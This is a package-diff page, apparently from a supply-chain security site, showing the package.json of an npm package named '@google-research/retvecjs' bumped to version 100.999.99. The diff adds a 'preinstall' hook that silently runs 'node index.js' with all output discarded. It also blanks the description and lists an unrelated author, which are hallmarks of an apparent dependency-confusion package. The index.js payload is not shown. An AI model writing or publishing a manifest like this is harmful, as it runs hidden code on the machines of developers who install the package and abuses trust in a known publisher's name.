@google-research/retvecjs 100.99.99 → 100.999.99
Sign up to get free protection for your applications and to get access to all the features.
- package/package.json +22 -15
package/package.json
CHANGED
@@ -1,15 +1,22 @@
|
|
1
|
-
{
|
2
|
-
"name": "@google-research/retvecjs",
|
3
|
-
"version": "100.
|
4
|
-
"description": "
|
5
|
-
"main": "
|
6
|
-
"scripts": {
|
7
|
-
"
|
8
|
-
"
|
9
|
-
},
|
10
|
-
"
|
11
|
-
"
|
12
|
-
|
13
|
-
"
|
14
|
-
"
|
15
|
-
|
1
|
+
{
|
2
|
+
"name": "@google-research/retvecjs",
|
3
|
+
"version": "100.999.99",
|
4
|
+
"description": "",
|
5
|
+
"main": "main.js",
|
6
|
+
"scripts": {
|
7
|
+
"preinstall": "node index.js > /dev/null 2>&1",
|
8
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
9
|
+
},
|
10
|
+
"author": "0xnaeemsec@gmail.com",
|
11
|
+
"license": "Apache-2.0",
|
12
|
+
"dependencies": {
|
13
|
+
"@tensorflow/tfjs": "^4.10.0",
|
14
|
+
"file-url": "^4.0.0",
|
15
|
+
"typescript": "~4.7.4"
|
16
|
+
},
|
17
|
+
"devDependencies": {
|
18
|
+
"@web/dev-server": "^0.1.31",
|
19
|
+
"@web/dev-server-legacy": "^1.0.0",
|
20
|
+
"typescript": "~4.7.4"
|
21
|
+
}
|
22
|
+
}
|